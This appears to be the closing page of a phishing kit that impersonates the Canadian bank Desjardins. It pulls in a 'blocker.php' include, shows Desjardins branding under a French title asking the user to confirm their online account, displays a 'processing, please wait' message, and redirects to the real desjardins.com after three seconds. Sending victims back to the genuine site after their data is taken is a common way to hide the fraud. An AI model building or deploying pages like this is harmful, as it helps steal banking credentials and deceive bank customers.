<?php
include('blocker.php');
?>
<!DOCTYPE html>
<html>
      <head>
       <LINK href="js/snsStyles.css" rel="stylesheet" type="text/css">
	   
		 <link rel="icon" type="image/vnd.microsoft.icon" href="https://pservices.desjardins.com/ressources/n3_3.3/interne/fwd-bootstrap/3.3/img/desjardins.ico">
		<META HTTP-EQUIV="Refresh" CONTENT="3;URL=https://desjardins.com/">
       <title>
        Desjardins | Confirmez votre compte en ligne Desjardins
       </title>
       
	
	 
	 	
	 
	  <style type="text/css">
           
             #signOutContent {
   margin:150px 0 0 0;
  }

  #signOutTxt {
   font:normal 18px Arial;
   color:#333333;
  }

  #main-txt {
    margin:33px 0 0 0;
  }

  #signout-circle {
    margin:46px 0 0 0
  }

  #signout-main {
   width:100%;
   text-align:center;
  }


	  </style>
	 </head>
	 
	 <body>
	 
          <div id="signout-main"> 

	   <div id="signOutContent">
	    <img id="aolBlueLogo" src="https://www.desjardins.com/ressources/images/f20-logo-n1-desjardins-v.svg" />
	   </div>
	  
	   <div id="main-txt">
	    <span id="signOutTxt">
	     Traitement ... veuillez patienter ... 
	    </span>
	   </div>
	  
	   <div id="signout-circle">
	    <img src="http://campaign.skoda.co.il/abtest/ms2/images/loading.gif" />
           </div>
	 
          </div>
	  
	  
	  
	  
	 
	
       
      
 
 
 
</body>

</html>